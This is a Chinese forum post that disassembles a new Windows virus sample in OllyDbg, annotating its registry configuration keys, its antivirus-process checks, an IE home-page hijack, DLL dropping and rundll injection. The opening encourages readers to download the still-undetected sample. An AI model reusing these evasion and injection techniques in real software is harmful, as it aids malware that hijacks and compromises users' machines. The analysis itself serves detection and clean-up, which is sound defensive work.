这病毒样本是早两天得到的。刚刚在线杀毒,国内的杀毒软件都还未定义。看到帖子的不妨下下来看看你的杀毒软件可以查杀吗!感谢昨天打击我的人(自己),昨晚搞到12点写出
来的文章,以增加自信心用。由于是最新病毒,所以贴出来。晚点下载就会被杀毒软件加到特征库去了。本人QQ:591841426(学习交流之用,求破者勿扰)
闲话少说!开始。
得到的这个样本未加壳,长度为“256,144”字节,该样本使用“VC++”编写。
MD5值:F5E39FD21E72F15A966F90AA35725B87
1、先来看看病毒主体
; 00401660 — VC++ CRT start-up stub (WinMainCRTStartup-style, judging by the __set_app_type / __getmainargs / _initterm
; sequence). Installs an SEH frame, initialises MSVCRT, skips argv[0] in _acmdln to find lpCmdLine, then calls
; 004017FE with (hInstance, 0, lpCmdLine, nCmdShow) — i.e. WinMain — and exit()s with its result.
; This is compiler boilerplate; the sample's own behaviour starts in 004017FE.
00401660 >/$ 55 PUSH EBP //entry point: the debugger stops here on load
00401661 |. 8BEC MOV EBP,ESP
00401663 |. 6A FF PUSH -1 //initial trylevel
00401665 |. 68 A8524000 PUSH 复件_123.004052A8 //SEH scope table
0040166A |. 68 5A164000 PUSH <JMP.&MSVCRT._except_handler3> ; SE handler installation
0040166F |. 64:A1 0000000>MOV EAX,DWORD PTR FS:[0] //link a new EXCEPTION_REGISTRATION into the FS:[0] chain
00401675 |. 50 PUSH EAX
00401676 |. 64:8925 00000>MOV DWORD PTR FS:[0],ESP
0040167D |. 83EC 68 SUB ESP,68 //locals (argc/argv/envp, STARTUPINFO, ...)
00401680 |. 53 PUSH EBX
00401681 |. 56 PUSH ESI
00401682 |. 57 PUSH EDI
00401683 |. 8965 E8 MOV DWORD PTR SS:[EBP-18],ESP //saved ESP for the exception handler
00401686 |. 33DB XOR EBX,EBX //EBX = 0 for the rest of the function
00401688 |. 895D FC MOV DWORD PTR SS:[EBP-4],EBX //trylevel = 0
0040168B |. 6A 02 PUSH 2 //2 = _GUI_APP
0040168D |. FF15 50514000 CALL DWORD PTR DS:[<&MSVCRT.__set_app_ty>; msvcrt.__set_app_type
00401693 |. 59 POP ECX
00401694 |. 830D 10E64300>OR DWORD PTR DS:[43E610],FFFFFFFF //CRT globals set to -1 (names not visible in this listing)
0040169B |. 830D 14E64300>OR DWORD PTR DS:[43E614],FFFFFFFF
004016A2 |. FF15 54514000 CALL DWORD PTR DS:[<&MSVCRT.__p__fmode>] ; msvcrt.__p__fmode
004016A8 |. 8B0D 04E64300 MOV ECX,DWORD PTR DS:[43E604]
004016AE |. 8908 MOV DWORD PTR DS:[EAX],ECX //*__p__fmode() = [43E604]
004016B0 |. FF15 58514000 CALL DWORD PTR DS:[<&MSVCRT.__p__commode>; msvcrt.__p__commode
004016B6 |. 8B0D 00E64300 MOV ECX,DWORD PTR DS:[43E600]
004016BC |. 8908 MOV DWORD PTR DS:[EAX],ECX //*__p__commode() = [43E600]
004016BE |. A1 5C514000 MOV EAX,DWORD PTR DS:[<&MSVCRT._adjust_f>
004016C3 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
004016C5 |. A3 0CE64300 MOV DWORD PTR DS:[43E60C],EAX //copy _adjust_fdiv (Pentium FDIV workaround flag) into a local global
004016CA |. E8 16010000 CALL 复件_123.004017E5 //CRT init helper (body not shown)
004016CF |. 391D 10E44300 CMP DWORD PTR DS:[43E410],EBX
004016D5 |. 75 0C JNZ SHORT 复件_123.004016E3
004016D7 |. 68 E2174000 PUSH 复件_123.004017E2 //register a user _matherr only if [43E410] is still 0
004016DC |. FF15 60514000 CALL DWORD PTR DS:[<&MSVCRT.__setusermat>; msvcrt.__setusermatherr
004016E2 |. 59 POP ECX
004016E3 |> E8 E8000000 CALL 复件_123.004017D0 //CRT init helper (body not shown)
004016E8 |. 68 1C604000 PUSH 复件_123.0040601C
004016ED |. 68 18604000 PUSH 复件_123.00406018
004016F2 |. E8 D3000000 CALL <JMP.&MSVCRT._initterm> //_initterm(00406018, 0040601C): C initialisers
004016F7 |. A1 FCE54300 MOV EAX,DWORD PTR DS:[43E5FC]
004016FC |. 8945 94 MOV DWORD PTR SS:[EBP-6C],EAX //startinfo.newmode = [43E5FC]
004016FF |. 8D45 94 LEA EAX,DWORD PTR SS:[EBP-6C]
00401702 |. 50 PUSH EAX //&startinfo
00401703 |. FF35 F8E54300 PUSH DWORD PTR DS:[43E5F8] //dowildcard
00401709 |. 8D45 9C LEA EAX,DWORD PTR SS:[EBP-64]
0040170C |. 50 PUSH EAX //&envp
0040170D |. 8D45 90 LEA EAX,DWORD PTR SS:[EBP-70]
00401710 |. 50 PUSH EAX //&argv
00401711 |. 8D45 A0 LEA EAX,DWORD PTR SS:[EBP-60]
00401714 |. 50 PUSH EAX //&argc
00401715 |. FF15 68514000 CALL DWORD PTR DS:[<&MSVCRT.__getmainarg>; msvcrt.__getmainargs
0040171B |. 68 14604000 PUSH 复件_123.00406014
00401720 |. 68 00604000 PUSH 复件_123.00406000
00401725 |. E8 A0000000 CALL <JMP.&MSVCRT._initterm> //_initterm(00406000, 00406014): C++ static constructors
0040172A |. 83C4 24 ADD ESP,24 //pop the 9 dwords pushed for __getmainargs and the two _initterm calls
0040172D |. A1 6C514000 MOV EAX,DWORD PTR DS:[<&MSVCRT._acmdln>]
00401732 |. 8B30 MOV ESI,DWORD PTR DS:[EAX] //ESI = raw command line (_acmdln)
00401734 |. 8975 8C MOV DWORD PTR SS:[EBP-74],ESI
00401737 |. 803E 22 CMP BYTE PTR DS:[ESI],22 //does argv[0] start with a double quote?
0040173A |. 75 3A JNZ SHORT 复件_123.00401776 //no -> skip an unquoted program name instead
0040173C |> 46 /INC ESI //skip the quoted program name: advance until the closing quote or NUL (the author read this as "get own directory"; it is standard CRT lpCmdLine parsing)
0040173D |. 8975 8C |MOV DWORD PTR SS:[EBP-74],ESI
00401740 |. 8A06 |MOV AL,BYTE PTR DS:[ESI]
00401742 |. 3AC3 |CMP AL,BL //end of string?
00401744 |. 74 04 |JE SHORT 复件_123.0040174A
00401746 |. 3C 22 |CMP AL,22 //closing quote?
00401748 |.^ 75 F2 \JNZ SHORT 复件_123.0040173C //end of loop
0040174A |> 803E 22 CMP BYTE PTR DS:[ESI],22
0040174D |. 75 04 JNZ SHORT 复件_123.00401753
0040174F |> 46 INC ESI //step past the closing quote (also the body of the whitespace-skip loop below)
00401750 |. 8975 8C MOV DWORD PTR SS:[EBP-74],ESI
00401753 |> 8A06 MOV AL,BYTE PTR DS:[ESI]
00401755 |. 3AC3 CMP AL,BL
00401757 |. 74 04 JE SHORT 复件_123.0040175D
00401759 |. 3C 20 CMP AL,20
0040175B |.^ 76 F2 JBE SHORT 复件_123.0040174F //skip bytes <= 0x20 (whitespace) to reach lpCmdLine
0040175D |> 895D D0 MOV DWORD PTR SS:[EBP-30],EBX //STARTUPINFO.dwFlags = 0 (STARTUPINFO at EBP-5C, dwFlags at +0x2C)
00401760 |. 8D45 A4 LEA EAX,DWORD PTR SS:[EBP-5C]
00401763 |. 50 PUSH EAX ; /pStartupinfo
00401764 |. FF15 48504000 CALL DWORD PTR DS:[<&KERNEL32.GetStartup>; \GetStartupInfoA
0040176A |. F645 D0 01 TEST BYTE PTR SS:[EBP-30],1 //STARTF_USESHOWWINDOW set?
0040176E |. 74 11 JE SHORT 复件_123.00401781
00401770 |. 0FB745 D4 MOVZX EAX,WORD PTR SS:[EBP-2C] //nCmdShow = si.wShowWindow (+0x30)
00401774 |. EB 0E JMP SHORT 复件_123.00401784
00401776 |> 803E 20 /CMP BYTE PTR DS:[ESI],20 //unquoted argv[0]: skip until the first whitespace byte
00401779 |.^ 76 D8 |JBE SHORT 复件_123.00401753
0040177B |. 46 |INC ESI
0040177C |. 8975 8C |MOV DWORD PTR SS:[EBP-74],ESI
0040177F |.^ EB F5 \JMP SHORT 复件_123.00401776
00401781 |> 6A 0A PUSH 0A //otherwise nCmdShow = 10 (SW_SHOWDEFAULT)
00401783 |. 58 POP EAX
00401784 |> 50 PUSH EAX //nCmdShow
00401785 |. 56 PUSH ESI //lpCmdLine
00401786 |. 53 PUSH EBX //hPrevInstance = 0
00401787 |. 53 PUSH EBX ; /pModule
00401788 |. FF15 44504000 CALL DWORD PTR DS:[<&KERNEL32.GetModuleH>; \GetModuleHandleA
0040178E |. 50 PUSH EAX //hInstance
0040178F |. E8 6A000000 CALL 复件_123.004017FE //the program's main CALL: WinMain(hInstance, 0, lpCmdLine, nCmdShow) — the sample's real logic starts there
00401794 |. 8945 98 MOV DWORD PTR SS:[EBP-68],EAX
00401797 |. 50 PUSH EAX ; /status
00401798 |. FF15 70514000 CALL DWORD PTR DS:[<&MSVCRT.exit>] ; \exit
0040179E |. 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14] //SEH filter: EAX = EXCEPTION_POINTERS*
004017A1 |. 8B08 MOV ECX,DWORD PTR DS:[EAX]
004017A3 |. 8B09 MOV ECX,DWORD PTR DS:[ECX] //ECX = ExceptionRecord->ExceptionCode
004017A5 |. 894D 88 MOV DWORD PTR SS:[EBP-78],ECX
004017A8 |. 50 PUSH EAX
004017A9 |. 51 PUSH ECX
004017AA |. E8 15000000 CALL <JMP.&MSVCRT._XcptFilter> //_XcptFilter(code, pointers): CRT default filter
004017AF |. 59 POP ECX
004017B0 |. 59 POP ECX
004017B1 \. C3 RETN //returns the filter disposition
; 0040443F — top-level malicious driver. The first line carries no OllyDbg "/$" mark, but the MOV EAX,handler / CALL 004015F0
; pair is the usual VC EH prolog, so this is presumably the function start (reached from WinMain; caller not shown).
; Visible sequence: build a CString into the global at 0043E5E4, write the HKLM\SOFTWARE\Softfy\* configuration (00403000,
; 0040345F), probe for AV processes (ravmond.exe = Rising monitor, 360tray.exe = 360 Safeguard) and hijack the IE home page
; only when 360tray is NOT running, then drop files and a DLL, inject into rundll and release the payload, with Sleep()s between steps.
; Detection angle: the AV-aware branch, the Sleep() pacing and the registry tree below are all observable from a sandbox.
0040443F . B8 5C194000 MOV EAX,复件_123.0040195C //EH handler for this frame
00404444 . E8 A7D1FFFF CALL 复件_123.004015F0 //004015F0 appears to be __EH_prolog (EBP frame + FS:[0] handler; see the epilogue)
00404449 . 51 PUSH ECX
0040444A . 56 PUSH ESI
0040444B . 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] //temp CString at EBP-10
0040444E . 57 PUSH EDI
0040444F . 50 PUSH EAX
00404450 . E8 93CEFFFF CALL 复件_123.004012E8 //004012E8(&tmp): builds a CString (contents not shown in this post)
00404455 . 59 POP ECX
00404456 . 8365 FC 00 AND DWORD PTR SS:[EBP-4],0 //trylevel = 0 (tmp is live)
0040445A . 50 PUSH EAX
0040445B . B9 E4E54300 MOV ECX,复件_123.0043E5E4 //global CString 0043E5E4 = tmp; 0040345F later writes it as the "dllname" value under SOFTWARE\Softfy\CSID
00404460 . E8 43D1FFFF CALL <JMP.&MFC42.#858_??4CString@@QAEABV>
00404465 . 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF //trylevel = -1
00404469 . 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
0040446C . E8 3BD0FFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ> //destroy tmp
00404471 . E8 8AEBFFFF CALL 复件_123.00403000 //creates registry keys (author; body not shown)
00404476 . E8 E4EFFFFF CALL 复件_123.0040345F //creates HKLM\SOFTWARE\Softfy\{Plug,PlugDown,WebIni,LockPage,CSID} — listed later in the post
0040447B . 8B35 54504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.Sleep>] ; kernel32.Sleep
00404481 . BF C8000000 MOV EDI,0C8 //EDI = 200 ms, reused for the next Sleep() calls
00404486 . 57 PUSH EDI ; /Timeout => 200. ms
00404487 . FFD6 CALL ESI ; \Sleep //sleep 200 ms
00404489 . E8 72FBFFFF CALL 复件_123.00404000 //enumerate processes; EAX = 1 if ravmond.exe (Rising AV) is running
0040448E . 85C0 TEST EAX,EAX
00404490 . 74 0C JE SHORT 复件_123.0040449E
00404492 . E8 1CFEFFFF CALL 复件_123.004042B3 //ravmond present: alternate path (004042B3 / 00404311 not listed), home-page hijack skipped
00404497 . E8 75FEFFFF CALL 复件_123.00404311
0040449C . EB 0E JMP SHORT 复件_123.004044AC
0040449E > E8 E6FEFFFF CALL 复件_123.00404389 //enumerate processes; EAX = 1 if 360tray.exe (360 Safeguard) is running
004044A3 . 85C0 TEST EAX,EAX
004044A5 . 75 05 JNZ SHORT 复件_123.004044AC //360tray present -> skip the home-page hijack (AV-aware behaviour)
004044A7 . E8 2EFDFFFF CALL 复件_123.004041DA //point the IE "Open Home Page" verb at "...\IEXPLORE.EXE" http://www.rom12580.cn (listed later)
004044AC > 57 PUSH EDI
004044AD . FFD6 CALL ESI //Sleep(200)
004044AF . E8 16ECFFFF CALL 复件_123.004030CA //start dropping files (author)
004044B4 . E8 58EDFFFF CALL 复件_123.00403211 //create a directory and drop a file (author)
004044B9 . A3 ECE54300 MOV DWORD PTR DS:[43E5EC],EAX //keep its result in global [43E5EC]
004044BE . E8 EEEEFFFF CALL 复件_123.004033B1 //drop iksii.dll (author)
004044C3 . 57 PUSH EDI
004044C4 . FFD6 CALL ESI //Sleep(200)
004044C6 . E8 D6EDFFFF CALL 复件_123.004032A1 //inject into the rundll process and run it (author)
004044CB . BF E8030000 MOV EDI,3E8 //EDI = 1000 ms from here on
004044D0 . 57 PUSH EDI
004044D1 . FFD6 CALL ESI //Sleep(1000)
004044D3 . E8 9FCBFFFF CALL 复件_123.00401077 //release the virus body (author)
004044D8 . 57 PUSH EDI
004044D9 . FFD6 CALL ESI //Sleep(1000)
004044DB . E8 C4FBFFFF CALL 复件_123.004040A4 //not listed
004044E0 . 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] //EH epilogue: previous FS:[0] record
004044E3 . 5F POP EDI
004044E4 . 33C0 XOR EAX,EAX //return 0
004044E6 . 5E POP ESI
004044E7 . 64:890D 00000>MOV DWORD PTR FS:[0],ECX //unlink the SEH frame
004044EE . C9 LEAVE
004044EF . C3 RETN
; 0040141D(CString name) — opens/creates HKLM\SOFTWARE\Softfy\PlugName (KEY_ALL_ACCESS, via 00401197) and writes the
; argument as the values "LogonName" and "LogonMainName" (via 0040201B). Nothing is written if the key cannot be created.
; This key is static in the binary: a straightforward host-based indicator for detection and clean-up.
0040141D /$ B8 8C184000 MOV EAX,复件_123.0040188C //EH handler for this frame
00401422 |. E8 C9010000 CALL 复件_123.004015F0 //VC EH prolog (see epilogue: FS:[0] restored from [EBP-C])
00401427 |. 83EC 0C SUB ESP,0C
0040142A |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0 //trylevel = 0
0040142E |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00401431 |. E8 C7FCFFFF CALL 复件_123.004010FD //construct the registry-helper object at EBP-18 (HKEY at +4, CString subkey at +8 — see 00401197)
00401436 |. 68 60E04300 PUSH 复件_123.0043E060 ; ASCII "SOFTWARE\Softfy\PlugName"
0040143B |. 68 02000080 PUSH 80000002 //hKey = HKEY_LOCAL_MACHINE
00401440 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00401443 |. C645 FC 01 MOV BYTE PTR SS:[EBP-4],1 //trylevel = 1 (helper object live)
00401447 |. E8 4BFDFFFF CALL 复件_123.00401197 //create the key: RegCreateKeyExA(HKLM, "SOFTWARE\Softfy\PlugName", KEY_ALL_ACCESS); EAX = LSTATUS
0040144C |. 85C0 TEST EAX,EAX
0040144E |. 75 20 JNZ SHORT 复件_123.00401470 //non-zero status -> skip the value writes
00401450 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] //value data = the CString argument
00401453 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00401456 |. 68 54E04300 PUSH 复件_123.0043E054 ; ASCII "LogonName"
0040145B |. E8 BB0B0000 CALL 复件_123.0040201B //set the "LogonName" value
00401460 |. FF75 08 PUSH DWORD PTR SS:[EBP+8]
00401463 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00401466 |. 68 44E04300 PUSH 复件_123.0043E044 ; ASCII "LogonMainName"
0040146B |. E8 AB0B0000 CALL 复件_123.0040201B //set the "LogonMainName" value
00401470 |> 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00401473 |. E8 55FDFFFF CALL 复件_123.004011CD //close the key
00401478 |. 8065 FC 00 AND BYTE PTR SS:[EBP-4],0
0040147C |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
0040147F |. E8 AEFCFFFF CALL 复件_123.00401132 //destroy the helper object
00401484 |. 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF //trylevel = -1
00401488 |. 8D4D 08 LEA ECX,DWORD PTR SS:[EBP+8]
0040148B |. E8 1C000000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ> //destroy the by-value CString argument
00401490 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] //EH epilogue
00401493 |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX
0040149A |. C9 LEAVE
0040149B \. C3 RETN
; 00401197 (thiscall: this = ECX; stack args hKey, lpSubKey) — RegCreateKeyExA wrapper used by every registry routine in the sample.
; Copies lpSubKey into the CString at this+8, creates/opens the key with KEY_ALL_ACCESS and stores the HKEY at this+4;
; returns the LSTATUS in EAX (0 = ERROR_SUCCESS). Because it always *creates* with full access, every caller is a
; registry write even where the intent is only to read — useful when building registry-audit rules for this family.
00401197 /$ 55 PUSH EBP
00401198 |. 8BEC MOV EBP,ESP
0040119A |. 51 PUSH ECX //one local: lpdwDisposition at EBP-4
0040119B |. 56 PUSH ESI ; 复件_123.0043E5E8
0040119C |. 8BF1 MOV ESI,ECX //ESI = this
0040119E |. FF75 0C PUSH DWORD PTR SS:[EBP+C] //lpSubKey
004011A1 |. 8D4E 08 LEA ECX,DWORD PTR DS:[ESI+8]
004011A4 |. E8 09030000 CALL <JMP.&MFC42.#860_??4CString@@QAEABV> //this->subkey = lpSubKey
004011A9 |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
004011AC |. 83C6 04 ADD ESI,4 //ESI = &this->hKey
004011AF |. 50 PUSH EAX ; /pDisposition
004011B0 |. 33C0 XOR EAX,EAX ; |
004011B2 |. 56 PUSH ESI ; |pHandle
004011B3 |. 50 PUSH EAX ; |pSecurity => NULL
004011B4 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS //full access requested unconditionally
004011B9 |. 50 PUSH EAX ; |Options => REG_OPTION_NON_VOLATILE
004011BA |. 50 PUSH EAX ; |Class => NULL
004011BB |. 50 PUSH EAX ; |Reserved => 0
004011BC |. FF75 0C PUSH DWORD PTR SS:[EBP+C] ; |Subkey
004011BF |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |hKey
004011C2 |. FF15 08504000 CALL DWORD PTR DS:[<&ADVAPI32.RegCreateK>; \RegCreateKeyExA //EAX = LSTATUS, passed straight back to the caller
004011C8 |. 5E POP ESI
004011C9 |. C9 LEAVE
004011CA \. C2 0800 RETN 8 //callee pops the two stack args
; 0040345F — writes the sample's configuration tree under HKLM\SOFTWARE\Softfy. Every key is created with KEY_ALL_ACCESS
; through 00401197, and the values are only written when that create succeeds. From the call sites, 0040201B takes a string
; value and 00402000 a numeric value (inferred from the argument types; bodies not shown).
;   Plug:     PlugUserName="full80", PlugSoftName="C2", PlugSoftVer="1.0.1", PlugSendNum=0, PlugStat=0, PlugUpdate="3.6.7", CoreDll=1, LoadNums=0
;   PlugDown: PlugOne="1.0.0", PlugTwo="1.0.0"
;   WebIni:   WebIniVer="1.0.0", WebIniSection=<16-bit result of 00403710>, HitProbaby=0
;   LockPage: LockPageNum=0, NeedLockPage=0
;   CSID:     csid="{C4560D12-CE25-4A2E-A5D4-B5070FCBE282}", dllname=<global CString 0043E5E4>, dllpath="D:\ssshall"
; All key and value names are static strings in the binary: good host-based indicators for detection and clean-up.
0040345F /$ B8 F8184000 MOV EAX,复件_123.004018F8 //EH handler for this frame
00403464 |. E8 87E1FFFF CALL 复件_123.004015F0 //VC EH prolog
00403469 |. 83EC 30 SUB ESP,30
0040346C |. 53 PUSH EBX
0040346D |. 56 PUSH ESI
0040346E |. 8D4D C4 LEA ECX,DWORD PTR SS:[EBP-3C]
00403471 |. E8 4AE1FFFF CALL <JMP.&MFC42.#354_??0CFile@@QAE@XZ> //CFile at EBP-3C: constructed and destroyed, otherwise unused in this function
00403476 |. 33DB XOR EBX,EBX //EBX = 0 (used as the numeric value 0 below)
00403478 |. 8D4D E0 LEA ECX,DWORD PTR SS:[EBP-20]
0040347B |. 895D FC MOV DWORD PTR SS:[EBP-4],EBX //trylevel = 0
0040347E |. E8 1DE0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ> //CString locals: EBP-20, EBP-1C, EBP-18, EBP-14 (each ctor bumps the trylevel)
00403483 |. 8D4D E4 LEA ECX,DWORD PTR SS:[EBP-1C]
00403486 |. C645 FC 01 MOV BYTE PTR SS:[EBP-4],1
0040348A |. E8 11E0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
0040348F |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00403492 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2
00403496 |. E8 05E0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
0040349B |. 8D4D EC LEA ECX,DWORD PTR SS:[EBP-14]
0040349E |. C645 FC 03 MOV BYTE PTR SS:[EBP-4],3
004034A2 |. E8 F9DFFFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
004034A7 |. 68 6CE24300 PUSH 复件_123.0043E26C ; ASCII "full80"
004034AC |. 8D4D E4 LEA ECX,DWORD PTR SS:[EBP-1C]
004034AF |. C645 FC 04 MOV BYTE PTR SS:[EBP-4],4
004034B3 |. E8 FADFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV> //[EBP-1C] = "full80"
004034B8 |. 68 68E24300 PUSH 复件_123.0043E268 ; ASCII "C2"
004034BD |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
004034C0 |. E8 EDDFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV> //[EBP-18] = "C2"
004034C5 |. 68 60E24300 PUSH 复件_123.0043E260 ; ASCII "1.0.1"
004034CA |. 8D4D EC LEA ECX,DWORD PTR SS:[EBP-14]
004034CD |. E8 E0DFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV> //[EBP-14] = "1.0.1"
004034D2 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004034D5 |. E8 23DCFFFF CALL 复件_123.004010FD //construct the registry-helper object at EBP-2C (HKEY at +4, CString subkey at +8)
004034DA |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
004034DD |. C645 FC 05 MOV BYTE PTR SS:[EBP-4],5
004034E1 |. E8 BADFFFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ> //CString at EBP-10 for the subkey name
004034E6 |. 68 44E24300 PUSH 复件_123.0043E244 ; ASCII " SOFTWARE\Softfy\Plug" //note the leading space, removed by TrimLeft below
004034EB |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
004034EE |. C645 FC 06 MOV BYTE PTR SS:[EBP-4],6
004034F2 |. E8 BBDFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034F7 |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
004034FA |. E8 BBE0FFFF CALL <JMP.&MFC42.#6282_?TrimLeft@CString>
004034FF |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00403502 |. E8 ADE0FFFF CALL <JMP.&MFC42.#6283_?TrimRight@CStrin> //subkey = "SOFTWARE\Softfy\Plug"
00403507 |. FF75 F0 PUSH DWORD PTR SS:[EBP-10]
0040350A |. BE 02000080 MOV ESI,80000002 //ESI = HKEY_LOCAL_MACHINE for all creates in this function
0040350F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403512 |. 56 PUSH ESI
00403513 |. E8 7FDCFFFF CALL 复件_123.00401197 //create HKLM\SOFTWARE\Softfy\Plug; EAX = LSTATUS
00403518 |. 85C0 TEST EAX,EAX
0040351A |. 75 7B JNZ SHORT 复件_123.00403597 //failed -> skip the Plug values
0040351C |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C]
0040351F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403522 |. 68 34E24300 PUSH 复件_123.0043E234 ; ASCII "PlugUserName"
00403527 |. E8 EFEAFFFF CALL 复件_123.0040201B //PlugUserName = "full80"
0040352C |. FF75 E8 PUSH DWORD PTR SS:[EBP-18]
0040352F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403532 |. 68 24E24300 PUSH 复件_123.0043E224 ; ASCII "PlugSoftName"
00403537 |. E8 DFEAFFFF CALL 复件_123.0040201B //PlugSoftName = "C2"
0040353C |. FF75 EC PUSH DWORD PTR SS:[EBP-14]
0040353F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403542 |. 68 18E24300 PUSH 复件_123.0043E218 ; ASCII "PlugSoftVer"
00403547 |. E8 CFEAFFFF CALL 复件_123.0040201B //PlugSoftVer = "1.0.1"
0040354C |. 53 PUSH EBX
0040354D |. 68 0CE24300 PUSH 复件_123.0043E20C ; ASCII "PlugSendNum"
00403552 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403555 |. E8 A6EAFFFF CALL 复件_123.00402000 //PlugSendNum = 0 (numeric value setter)
0040355A |. 53 PUSH EBX
0040355B |. 68 00E24300 PUSH 复件_123.0043E200 ; ASCII "PlugStat"
00403560 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403563 |. E8 98EAFFFF CALL 复件_123.00402000 //PlugStat = 0
00403568 |. 68 F8E14300 PUSH 复件_123.0043E1F8 ; ASCII "3.6.7"
0040356D |. 68 ECE14300 PUSH 复件_123.0043E1EC ; ASCII "PlugUpdate"
00403572 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403575 |. E8 A1EAFFFF CALL 复件_123.0040201B //PlugUpdate = "3.6.7"
0040357A |. 6A 01 PUSH 1
0040357C |. 68 E4E14300 PUSH 复件_123.0043E1E4 ; ASCII "CoreDll"
00403581 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403584 |. E8 77EAFFFF CALL 复件_123.00402000 //CoreDll = 1
00403589 |. 53 PUSH EBX
0040358A |. 68 D8E14300 PUSH 复件_123.0043E1D8 ; ASCII "LoadNums"
0040358F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403592 |. E8 69EAFFFF CALL 复件_123.00402000 //LoadNums = 0
00403597 |> 57 PUSH EDI //save EDI; it is reused as the "1.0.0" pointer below and restored at 00403637
00403598 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
0040359B |. E8 2DDCFFFF CALL 复件_123.004011CD //close the Plug key
004035A0 |. 68 BCE14300 PUSH 复件_123.0043E1BC ; ASCII "SOFTWARE\Softfy\PlugDown"
004035A5 |. 56 PUSH ESI
004035A6 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035A9 |. E8 E9DBFFFF CALL 复件_123.00401197 //create HKLM\SOFTWARE\Softfy\PlugDown; the remaining keys follow the same create/set/close pattern
004035AE |. 85C0 TEST EAX,EAX
004035B0 |. BF B4E14300 MOV EDI,复件_123.0043E1B4 ; ASCII "1.0.0" //EDI = "1.0.0" (flags from TEST preserved by MOV)
004035B5 |. 75 1C JNZ SHORT 复件_123.004035D3
004035B7 |. 57 PUSH EDI
004035B8 |. 68 ACE14300 PUSH 复件_123.0043E1AC ; ASCII "PlugOne"
004035BD |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035C0 |. E8 56EAFFFF CALL 复件_123.0040201B //PlugOne = "1.0.0"
004035C5 |. 57 PUSH EDI
004035C6 |. 68 A4E14300 PUSH 复件_123.0043E1A4 ; ASCII "PlugTwo"
004035CB |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035CE |. E8 48EAFFFF CALL 复件_123.0040201B //PlugTwo = "1.0.0"
004035D3 |> 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035D6 |. E8 F2DBFFFF CALL 复件_123.004011CD //close PlugDown
004035DB |. 68 8CE14300 PUSH 复件_123.0043E18C ; ASCII "SOFTWARE\Softfy\WebIni"
004035E0 |. 56 PUSH ESI
004035E1 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035E4 |. E8 AEDBFFFF CALL 复件_123.00401197 //create HKLM\SOFTWARE\Softfy\WebIni
004035E9 |. 85C0 TEST EAX,EAX
004035EB |. 75 32 JNZ SHORT 复件_123.0040361F
004035ED |. 57 PUSH EDI
004035EE |. 68 80E14300 PUSH 复件_123.0043E180 ; ASCII "WebIniVer"
004035F3 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004035F6 |. E8 20EAFFFF CALL 复件_123.0040201B //WebIniVer = "1.0.0"
004035FB |. E8 10010000 CALL 复件_123.00403710 //00403710 returns a 16-bit value in AX (body not shown)
00403600 |. 0FB7C0 MOVZX EAX,AX
00403603 |. 50 PUSH EAX
00403604 |. 68 70E14300 PUSH 复件_123.0043E170 ; ASCII "WebIniSection"
00403609 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
0040360C |. E8 EFE9FFFF CALL 复件_123.00402000 //WebIniSection = that value
00403611 |. 53 PUSH EBX
